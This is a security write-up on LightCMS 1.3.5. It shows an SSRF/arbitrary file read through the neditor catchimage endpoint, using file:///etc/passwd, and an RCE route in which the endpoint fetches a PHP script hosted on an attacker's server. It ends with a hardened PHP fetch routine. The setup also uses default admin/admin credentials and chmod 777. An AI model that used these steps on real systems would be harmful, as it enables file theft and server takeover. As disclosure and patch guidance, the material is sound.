LightCMS 1.3.5 - Arbitrary File Reading & RCE Vulnerability


Environment Construction (Kali)

Personal environment configuration: php7.4.15 + mysql8.0.25
  1. First, make sure composer is installed on the system; you can refer to the article I wrote before: article link
  2. Download the source code:
cd /var/www/html
git clone https://hub.fastgit.org/eddy8/LightCMS.git
cd LightCMS
composer install
  3. Set directory permissions: the storage/ and bootstrap/cache/ directories need to be writable.
sudo chmod 777 -R storage/ bootstrap/cache/
  4. Create a new environment configuration and set the database and other related settings:
cp .env.example .env

Database configuration:
CREATE DATABASE homestead;
CREATE USER 'homestead'@'localhost' IDENTIFIED BY 'secret';
GRANT ALL PRIVILEGES ON *.* TO 'homestead'@'localhost';
FLUSH PRIVILEGES;
  5. Initialize the system:
php artisan migrate --seed

PS: you may run into some problems here; I note the ones I hit and how I solved them:
1. If the vendor directory is not generated when installing the components, run composer install --ignore-platform-reqs
2. An Illuminate\Database\QueryException when starting the service may be because the php-mysql dependency is not installed:
step1: php -v
step2: install the php mysql extension
php 7.x: sudo apt-get install php7.x-mysql
step3: service apache2 restart
step4: php artisan migrate
  6. Backend login address: /admin/login
Default user (this user is a superuser and is not subject to permission management): admin/admin
The captcha image may fail to display here; in the terminal run: apt-get install php7.x-gd

Vulnerability reproduction

Exploitation point one

Log in as the administrator with admin/admin.
Visit http://ip/admin/neditor/serve/catchimage and POST file=file:///etc/passwd; the response is
{"list":[{"url":"http://light.com/upload/image/202106/0f1726ba83325848d47e216b29d5ab99.jpg","source":"file:///etc/passwd","state":"SUCCESS"}]}
The url field in the response is the saved copy of the fetched file; visiting that link directly returns its contents.

Exploitation point two

Fetching a PHP file directly gives RCE: host a PHP script on a VPS, have the endpoint fetch it, then access the saved file.

Vulnerability analysis

The vulnerability lies in the remote image download function in app/Http/Controllers/Admin/NEditorController.php.
It simply calls file_get_contents to fetch the content and then saves it, so the file:// protocol can be used for arbitrary file reading and other SSRF operations. More dangerous still, the logic keeps whatever suffix the fetched file name carries and saves the file with that same suffix, so a PHP one-liner placed on a server and fetched through this endpoint is stored as a .php file; requesting it afterwards gives a shell.
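For contrast, here is how the same "catch remote image" routine looks once the missing checks are in place. This is an added hardening example written for this write-up; it is not LightCMS code and does not reproduce the project's NEditorController. The function names (isSafeRemoteUrl, extensionFromContent, catchImageSafely), the allowed MIME table and the 5 MB size cap are my own choices, and the example assumes ext/fileinfo is loaded. It addresses the two defects described above: the scheme is no longer left to the caller, and the stored extension comes from the downloaded bytes instead of from the URL.

```php
<?php
// Added hardening example for the write-up above (not LightCMS code):
// a remote-image fetch that refuses non-http(s) schemes and internal hosts,
// caps the download size and derives the extension from the file content.
declare(strict_types=1);

// Only fetch over http(s); file://, php://, data: and similar are refused.
const ALLOWED_SCHEMES = ['http', 'https'];
// Extension is chosen from the bytes received, never from the URL.
const ALLOWED_MIME = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

/** True when $url is an absolute http(s) URL whose host resolves to a public address. */
function isSafeRemoteUrl(string $url): bool
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false; // file:///etc/passwd has no host and is rejected here
    }
    if (!in_array(strtolower($parts['scheme']), ALLOWED_SCHEMES, true)) {
        return false;
    }
    $host = $parts['host'];
    // Resolve names once so that hostnames pointing at internal addresses are checked too.
    $ip = filter_var($host, FILTER_VALIDATE_IP) !== false ? $host : gethostbyname($host);
    // gethostbyname() returns the name unchanged when resolution fails.
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return false;
    }
    // Basic SSRF guard: refuse loopback, link-local, private and reserved ranges.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/** Extension derived from the downloaded bytes; null when not an allowed image type. */
function extensionFromContent(string $bytes): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes); // requires ext/fileinfo
    return ALLOWED_MIME[$mime] ?? null;
}

/** Fetch $url with a size cap and store it under a random name; null on any rejection. */
function catchImageSafely(string $url, string $dir, int $maxBytes = 5 * 1024 * 1024): ?string
{
    if (!isSafeRemoteUrl($url)) {
        return null;
    }
    // No redirects: a redirect could otherwise lead to an internal host or another scheme.
    $ctx = stream_context_create(['http' => ['timeout' => 10, 'follow_location' => 0]]);
    $bytes = @file_get_contents($url, false, $ctx, 0, $maxBytes + 1);
    if ($bytes === false || strlen($bytes) > $maxBytes) {
        return null;
    }
    $ext = extensionFromContent($bytes);
    if ($ext === null) {
        return null; // e.g. PHP source served under a .jpg name is dropped
    }
    // Random file name: the caller never influences what is written to disk.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $path = rtrim($dir, '/') . '/' . $name;
    return file_put_contents($path, $bytes) === false ? null : $path;
}

// Offline demonstration: the page's own payload plus a loopback URL. Both are
// rejected by the URL check before any network access takes place.
foreach (['file:///etc/passwd', 'http://127.0.0.1/admin/'] as $u) {
    printf("%-28s %s\n", $u, isSafeRemoteUrl($u) ? 'allowed' : 'rejected');
}
// Constructed bodies: a GIF header maps to an image extension, PHP source maps to null.
var_dump(extensionFromContent("GIF89a\x01\x00\x01\x00"));
var_dump(extensionFromContent("<?php echo 'not an image'; ?>"));
```

Two caveats on the design. The hostname is resolved once in isSafeRemoteUrl and again inside file_get_contents, so a DNS answer that changes between the two lookups (rebinding) can slip past the range check; a production version should pin the resolved address for the actual request, for example with cURL's CURLOPT_RESOLVE. And the content check is defence in depth, not a substitute for serving the upload directory with PHP execution disabled: even a file that passes as an image must never be handed to the PHP interpreter.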